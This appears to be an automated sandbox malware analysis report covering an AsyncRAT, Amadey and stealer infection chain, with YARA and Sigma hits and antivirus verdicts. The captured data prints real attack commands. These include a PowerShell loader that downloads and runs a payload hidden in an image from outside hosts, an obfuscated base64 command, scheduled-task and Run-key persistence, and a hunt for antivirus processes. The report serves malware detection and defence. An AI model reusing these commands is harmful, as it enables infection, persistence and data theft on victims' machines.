22.3.Macromedia.com.36a8750.0.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x14ce7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x16040:$a2: Stub.exe 0x160d0:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x11b05:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x14eff:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x14d77:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient 0x12854:$a6: get_SslClient
22.3.Macromedia.com.36a8750.0.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x11b05:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x12854:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x12870:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x1111b:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x1116b:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x1189a:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x1501d:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0x1509f:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x16040:$str09: Stub.exe 0x160d0:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL
22.3.Macromedia.com.36a8750.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14d79:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
21.2.e2b0a87ceb.exe.3ef9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.random.exe.650000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.ac0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
41.2.FQZHGI4TELUEK712J739LWFDT7.exe.b60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.ac0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
56.2.Fe36XBk.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
56.2.Fe36XBk.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x12600:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x126a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x12770:$s2: Elevation:Administrator!new:
57.2.8b3fbc1053.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
57.2.8b3fbc1053.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x12600:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x126a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x12770:$s2: Elevation:Administrator!new:
33.2.5a4a47dccd.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
33.2.5a4a47dccd.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x12600:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x126a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x12770:$s2: Elevation:Administrator!new:
Click to see the 24 entries

Other

Source	Rule	Description	Author	Strings
amsi32_2916.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi32_2916.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x13b35a:$b1: ::WriteAllBytes( 0xdc36e:$b2: ::FromBase64String( 0x13b30a:$b2: ::FromBase64String( 0xe7b3c:$s1: -join 0xe12e8:$s4: += 0xe13aa:$s4: += 0xe55d1:$s4: += 0xe76ee:$s4: += 0xe79d8:$s4: += 0xe7b1e:$s4: += 0x13df65:$s4: += 0x13e069:$s4: += 0x1414c5:$s4: += 0x141ba5:$s4: += 0x14205b:$s4: += 0x1420b0:$s4: += 0x142324:$s4: += 0x142353:$s4: += 0x14289b:$s4: += 0x1428ca:$s4: += 0x1429a9:$s4: +=
amsi64_6404.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[C

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dfd80aba08.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedPayload_1077866732\bs.bat

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a27a89a5061.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6784, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs" , ProcessId: 8076, ProcessName: wscript.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Macromedia.com F, ParentImage: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com, ParentProcessId: 3300, ParentProcessName: Macromedia.com, ProcessCommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 6112, ProcessName: schtasks.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 8164, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", ProcessId: 2916, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 6244, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dfd80aba08.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedPayload_1077866732\bs.bat

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe, ParentProcessId: 7596, ParentProcessName: 487dac876e.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ProcessId: 3844, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[C

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 6244, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 8164, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1", ProcessId: 2916, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Sigma detected: Powershell download and load assembly

Source: Process started

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3844, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7804, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\loqVSeJ[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
